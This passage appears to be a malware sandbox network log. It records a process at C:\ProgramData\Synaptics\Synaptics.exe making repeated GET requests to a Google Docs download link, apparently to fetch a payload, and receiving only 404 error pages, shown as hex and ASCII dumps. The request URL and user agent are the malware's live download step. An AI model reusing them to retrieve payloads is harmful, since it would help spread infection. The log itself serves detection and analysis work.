                                                                                                                                                                                  2022-05-27 02:38:20 UTC17INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 79 62 4e 6e 66 55 54 49 64 36 50 5a 4f 47 79 50 50 52 37 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UybNnfUTId6PZOGyPPR7KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:20 UTC18INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:20 UTC19INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  5192.168.2.349744172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:19 UTC12OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:20 UTC12INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:20 UTC14INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 5f 45 58 6f 70 38 42 36 4c 41 38 48 2d 56 4a 66 66 4b 55 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u_EXop8B6LA8H-VJffKUSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:20 UTC15INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:20 UTC15INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  6192.168.2.349745172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:20 UTC19OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:20 UTC19INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:20 UTC20INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 72 6f 77 6d 73 55 30 44 63 54 77 72 6e 42 77 4a 59 47 68 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rowmsU0DcTwrnBwJYGhWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:20 UTC22INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:20 UTC22INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  7192.168.2.349747172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:20 UTC19OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:20 UTC22INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:20 UTC23INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:20 UTC23INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 66 34 6c 6c 55 4d 31 5f 61 35 79 52 6e 76 63 7a 76 75 39 73 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="df4llUM1_a5yRnvczvu9sA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:20 UTC25INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:20 UTC25INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  8192.168.2.349749172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:20 UTC22OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:20 UTC25INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:20 UTC26INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:20 UTC26INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 79 51 44 37 67 48 72 51 61 7a 7a 31 4b 53 6d 6c 6b 4d 51 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AyQD7gHrQazz1KSmlkMQvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:20 UTC28INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:20 UTC28INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  9192.168.2.349750172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:20 UTC25OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:21 UTC28INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:21 UTC29INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:21 UTC29INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 5a 58 77 4c 73 57 64 62 78 39 74 75 45 6e 77 57 76 46 4e 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
